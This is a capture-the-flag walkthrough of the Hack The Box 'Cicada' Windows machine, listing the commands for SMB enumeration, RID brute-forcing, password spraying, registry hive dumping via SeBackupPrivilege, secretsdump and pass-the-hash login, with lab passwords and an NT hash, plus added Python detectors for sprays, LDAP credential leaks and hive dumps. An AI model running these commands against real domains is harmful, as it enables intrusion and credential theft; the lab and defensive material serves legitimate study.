Hackthebox - Cicada

HTB Cicada Writeup - Steps and Commands

1. Recon: Nmap Scan

Scan the target machine to identify open ports and services:

nmap -sC -sV -oN nmap_scan.txt cicada.htb

  • Key ports: Kerberos (88), LDAP (389, 636), SMB (445), WinRM over HTTP (5985)

2. SMB Enumeration

Check which SMB shares are reachable with a null session (no credentials):

smbclient -L //cicada.htb -N

  • Result: the HR share is accessible anonymously and contains a file with a default password.

3. RID Brute-Forcing for Usernames

Use netexec with the same null session to brute-force RIDs and enumerate valid usernames, saving the output for the next step:

netexec smb cicada.htb -u '' -p '' --rid-brute | tee output.txt

Extract the usernames from the output (everything after the CICADA\ domain prefix; this also picks up group and machine accounts, which simply fail during the spray):

grep -oP '(?<=CICADA\\)[^ ]+' output.txt > usernames.txt

4. Password Spray for User Login

Perform password spraying against the enumerated usernames with the default password recovered from the HR share (single-quote it so the shell does not expand the $ and * characters):

netexec smb cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

  • Result: valid credentials for michael.wrightson.
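From the defender's side, a spray like the one above leaves a distinctive footprint on the domain controller: one source address producing failed logons (Security event 4625) against many different accounts within a short window, typically followed by a single successful logon (4624) for the account whose password matched. The Python below is an added example, not part of the writeup, that implements that detection over a constructed set of event records; the tuple layout, timestamps, account names and addresses are all made up for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log records reduced to the fields a spray
# detector needs: (timestamp, event_id, target_user, source_ip).
# 4625 = failed logon, 4624 = successful logon. All values are made up.
SAMPLE_EVENTS = [
    ("2024-10-01T10:00:01", 4625, "alice.example", "10.10.14.5"),
    ("2024-10-01T10:00:02", 4625, "bob.example", "10.10.14.5"),
    ("2024-10-01T10:00:03", 4625, "carol.example", "10.10.14.5"),
    ("2024-10-01T10:00:04", 4625, "dave.example", "10.10.14.5"),
    ("2024-10-01T10:00:05", 4625, "erin.example", "10.10.14.5"),
    ("2024-10-01T10:00:06", 4624, "michael.wrightson", "10.10.14.5"),
    # One user mistyping their own password twice is not a spray.
    ("2024-10-01T11:30:00", 4625, "frank.example", "10.10.14.9"),
    ("2024-10-01T11:30:20", 4625, "frank.example", "10.10.14.9"),
    ("2024-10-01T11:31:00", 4624, "frank.example", "10.10.14.9"),
]


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Return {source_ip: (window_start, accounts)} for every source whose failed
    logons touched at least `min_accounts` distinct accounts within `window`."""
    failures = defaultdict(list)
    for ts, event_id, user, ip in events:
        if event_id == 4625:
            failures[ip].append((datetime.fromisoformat(ts), user))

    alerts = {}
    for ip, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it spans at most `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {user for _, user in fails[start:end + 1]}
            if len(accounts) >= min_accounts:
                alerts[ip] = (fails[start][0], accounts)
                break
    return alerts


def successes_after_spray(events, alerts, grace=timedelta(minutes=30)):
    """For each alerted source, list accounts that logged on successfully (4624)
    from that source within `grace` of the spray starting: the likely compromise."""
    hits = defaultdict(list)
    for ts, event_id, user, ip in events:
        if event_id != 4624 or ip not in alerts:
            continue
        window_start = alerts[ip][0]
        t = datetime.fromisoformat(ts)
        if window_start <= t <= window_start + grace:
            hits[ip].append(user)
    return dict(hits)


if __name__ == "__main__":
    found = detect_password_spray(SAMPLE_EVENTS)
    for ip, (start, accounts) in found.items():
        print(f"spray from {ip} starting {start}: {len(accounts)} accounts")
    for ip, users in successes_after_spray(SAMPLE_EVENTS, found).items():
        print(f"  successful logons from {ip} after spray: {users}")
```

The thresholds (five accounts in ten minutes, a thirty-minute grace period for the follow-on success) are deliberately conservative starting points; the second function is the part worth keeping, because the one success after a run of failures is the account that actually needs a password reset.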

5. LDAP Enumeration

Use the credentials to enumerate users via LDAP (quote the password here as well):

netexec ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

  • Result: the user listing exposes credentials for david.orelious.
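The credential picked up here is a reminder to audit the directory itself: free-text attributes such as description, info and comment are readable by any authenticated domain user, so a password written into one of them is effectively public to the whole domain. The Python below is an added example, not from the writeup (which does not say which attribute held the password), that scans an LDIF export of user objects for credential-looking text in those attributes; the entries are constructed and the attribute list and keyword pattern are assumptions.

```python
import re

# Constructed LDIF-style output, in the shape an ldapsearch of user objects
# produces. Names, DNs and values are made up for this example.
SAMPLE_LDIF = """\
dn: CN=Alice Example,CN=Users,DC=example,DC=local
sAMAccountName: alice.example
description: Helpdesk analyst

dn: CN=Bob Example,CN=Users,DC=example,DC=local
sAMAccountName: bob.example
description: Just in case I forget my password is Summer2024!
info: created 2024-01-02

dn: CN=Carol Example,CN=Users,DC=example,DC=local
sAMAccountName: carol.example
comment: temp pwd: Welcome123
"""

# Free-text attributes readable by any authenticated domain user (assumed set).
SENSITIVE_ATTRS = ("description", "info", "comment")
# Words that usually accompany a written-down credential (assumed pattern).
CRED_HINT = re.compile(r"\b(passwords?|passwd|passphrase|pwd|credentials?)\b", re.IGNORECASE)


def parse_ldif(text):
    """Minimal LDIF reader: entries separated by blank lines, one 'attr: value'
    per line. Base64 ('::') values and continuation lines are not handled."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        current.setdefault(attr.strip().lower(), []).append(value.strip())
    if current:
        entries.append(current)
    return entries


def find_credential_leaks(entries):
    """Return [(sAMAccountName, attribute, value)] for every sensitive attribute
    whose text looks like it carries a credential."""
    findings = []
    for entry in entries:
        name = entry.get("samaccountname", ["<unknown>"])[0]
        for attr in SENSITIVE_ATTRS:
            for value in entry.get(attr, []):
                if CRED_HINT.search(value):
                    findings.append((name, attr, value))
    return findings


if __name__ == "__main__":
    for name, attr, value in find_credential_leaks(parse_ldif(SAMPLE_LDIF)):
        print(f"[LEAK] {name}: {attr} = {value!r}")
```

Run it against a real export by feeding the file contents to parse_ldif; the keyword list will miss a bare password with no surrounding hint, so treat a clean result as a first pass rather than proof.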

6. Accessing SMB DEV Share

Connect to the DEV share with david.orelious's credentials and download Backup_script.ps1 (get Backup_script.ps1 at the smb: prompt):

smbclient //cicada.htb/DEV -U david.orelious

  • Result: the script contains credentials for emily.oscars.

7. WinRM Access

Log in using evil-winrm with emily.oscars's credentials:

evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b7tVt'

8. Privilege Escalation with SeBackupPrivilege

Run whoami /all to confirm Emily's privileges. Because Emily holds SeBackupPrivilege, which grants read access that bypasses file and registry ACLs, she can dump the SAM, SYSTEM and SECURITY registry hives (create c:\Temp first if it does not exist):

reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
reg save hklm\security c:\Temp\security

9. Extract Secrets from the Registry Hives

Download the three hives to the attacking machine (evil-winrm's download command) and use Impacket's secretsdump to extract the local hashes offline:

impacket-secretsdump -sam sam -system system -security security local
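Detecting the hive dump from steps 8 and 9 is straightforward wherever process command-line auditing is enabled (Security event 4688 with "Include command line in process creation events", or Sysmon event 1): legitimate software rarely runs reg.exe save or export against the SAM, SYSTEM or SECURITY hive from an interactive session. The Python below is an added example, not part of the writeup, that flags such command lines; the sample lines are constructed, and the regular expression is an assumption about the command forms worth matching.

```python
import re

# Constructed process command lines, as recorded by Security event 4688 (with
# command-line auditing enabled) or Sysmon event 1. None are real telemetry.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\system32\reg.exe" save hklm\sam c:\Temp\sam',
    r'reg  save HKLM\SYSTEM C:\Temp\system',
    r'reg save "HKEY_LOCAL_MACHINE\SECURITY" C:\Temp\security',
    r'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    r'reg save hklm\software\contoso c:\backup\contoso.hiv',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Get-Process',
]

# reg[.exe] (optionally quoted, optionally with a full path), then save/export,
# then one of the three credential hives directly under HKLM.
HIVE_DUMP_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?reg(?:\.exe)?"?\s+(save|export)\s+'
    r'"?(?:hklm|hkey_local_machine)\\(sam|system|security)(?=[\s"]|$)',
    re.IGNORECASE,
)


def detect_hive_dump(command_line):
    """Return (verb, hive) when the command line writes a credential hive to
    disk, otherwise None."""
    m = HIVE_DUMP_RE.match(command_line)
    if m is None:
        return None
    return m.group(1).lower(), m.group(2).lower()


def scan_command_lines(lines):
    """Return [(index, verb, hive), ...] for every flagged command line."""
    hits = []
    for i, cl in enumerate(lines):
        result = detect_hive_dump(cl)
        if result is not None:
            hits.append((i, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for i, verb, hive in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"[ALERT] line {i}: reg {verb} of {hive.upper()} hive: "
              f"{SAMPLE_COMMAND_LINES[i]}")
```

Pair the alert with the account that ran the process: a hive save by a backup service account on a schedule is expected, the same command from an interactive WinRM session of a user who merely holds SeBackupPrivilege is not. Reducing the number of accounts that hold that privilege is the mitigation the writeup points at.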

10. Administrator Access

Use the extracted Administrator NT hash to log in over WinRM (pass-the-hash):

evil-winrm -i cicada.htb -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'

Summary

  • Enumerate SMB shares, brute-force RIDs, and perform password spraying

  • Use LDAP and SMB enumeration to gather credentials

  • Exploit SeBackupPrivilege to dump registry hives

  • Extract secrets with secretsdump and log in as Administrator
